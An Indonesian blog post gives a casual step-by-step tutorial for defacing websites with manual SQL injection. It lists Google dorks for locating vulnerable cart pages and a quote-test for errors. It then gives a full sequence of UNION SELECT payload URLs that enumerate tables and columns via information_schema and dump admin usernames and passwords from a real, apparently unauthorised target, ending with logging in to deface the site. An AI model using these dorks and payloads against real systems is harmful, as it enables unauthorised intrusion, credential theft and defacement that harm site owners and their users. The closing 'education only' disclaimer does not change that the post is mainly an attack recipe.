Selasa, 26 Juni 2018

Deface Dengan SQL Injection Manual

Hallo friend..
Kali ini w mau sharing kek judul di atas wkwkwkw.
seperti biasa teknik lama, tapi masih ok kok.

"Sql Injection adalah suatu teknik yg di gunakan oleh seorang attacker dengan memanfaatkan kesalahan sql yg menyebabkan kerentanan pada url seihingga dapat disisipi perintah sql untuk kepentingan attacker"

Yah itu pengertiannya yg w karang sedemikian rupa wkwkkww
Langsung aja lah kita praktek
Pertama seperti biasa kita dorking atau kalau sudah punya target yah langsung aja

Dork: 
  inurl:add_cart.php?num=
  inurl:addcart.php?
  inurl:addItem.php
  inurl:add-to-cart.php?ID=


Cari salah satu site, nah untuk ngecek site tersebut vuln atau enggak tambahin petik(') di belakang url

Example: http://site.co.li/admin.php?id=45'

Nah kalo muncul pesan error sql bla bla bla maka site tersebut vuln dan bisa di exploit kek di bawah.




Lanjut, setelah dapat target sekrang tambahkan syntak berikut di belakang url

 +order+by+1-- dibelakang url jadinya
jadinya:
 http://site.co.li/admin.php?id=45+order+by+1--

dan enter, terus ganti angka 1 jadi angka 2 dan seterusnya sampe ketemu error sql lagi. Kalo w error di angka 15, artinya ada 14 column dalam database tersebut.



Terus ganti perintanya dengan perintah 

 +union+select+1,2,3,4-- tergantung jumlah column yg ditemukan
tambahkan (-)strip didepan angka idnya atau tambahkan perintah +and+false+
Jadinya:
 http://site.co.li/news-full.php?id=-1049+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
atau
http://site.co.li/news-full.php?id=1049+and+false+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
 


Nah nanti akan muncul nomer togel, disini kalian bebas mau pilih angka berapa aja, pada dasarnya angka itu sama aja wkwkwk
W pilih angka 11, kita coba cek versi databasenya dengan perintah 

 @@version di ketik pada nomer togel pilihan kalian.
Jadinya:
 http://site.co.li/news-full.php?id=-1049+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14--


Nah keliatan dia pake mariaDB, lanjut kia liat nama-nama tabel yg ada pada database tersebut,

 group_concat(table_name) masukan di nomer togel kalian, kalo w no 11
 +from+information_schema.tables+where+table_schema=database()-- di akhir urlnya
Jadinya:
 http://site.co.li/news-full.php?id=-1049+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14+from+information_schema.tables+where+table_schema=database()--


Maka akan tampil nama-nama dari tabel dalam databasesnya, kalo kita mau deface maka yg kita cari adalah tabel yg berhubungan dengan user dan password misalnya tabel Users, admin, member atau apalah yg penting ada bau-bau usernya wkwkw.
Kalo live target gw tabel admin, tapi sebelum lanjut dump column, maka nama tabel harus di convert ke HexaDecimal. Buat convert kalian bisa pake online tools http://www.online-toolz.com/tools/text-hex-convertor.php (nanti tambahkan 0x didepan hasil outputnya) atau pake hackbar (sql > MySQL > MySQL CHAR).

Kemudian ganti group_concat(table_name) jadi group_concat(column_name) dan +from+information_schema.tables+where+table_name=database()-- jadi +from+information_schema.columns+where+table_name=0x61646d696e+--+

Nanti jadinya
 http://site.co.li/admin.php?=-45+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14+from+information_schema.columns+where+table_name=0x61646d696e+--+


Dan tampil isi dari tabel admin, ada column id, user,username dan password. Selanjutnya kita dump isi dari column id, username dan password saja.
Perintahnya ganti group_concat(id,0x3a,username,0x3,password) jadi group_concat(id,0x3a,username,0x3,password) 0x3a adalah tanda yg di convert ke Decimal dan yg bergaris miring adalah isi column yg mau w liat isinya wkwk. Ganti perintah +from+information_schema.columns+where+table_name=0x61646d696e+--+ jadi +from+admin+--+ yang bergaris miring adalah nama tabel yg sudah kita bokngkar tadi.



Dan nongol dah isi column id, username dan pasword. Biasanya passwordnya di hash tapi kebetulan live target w gk di password. Nah kalo udah gini tinggal cari admin login page dan masuk dah, kalo dah masuk ya terserah mau di apain wkwkw


NB: Semua artikel yg tercantum di http://www.tylexit.tk adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami   
Share this article on :

0 komentar:

Posting Komentar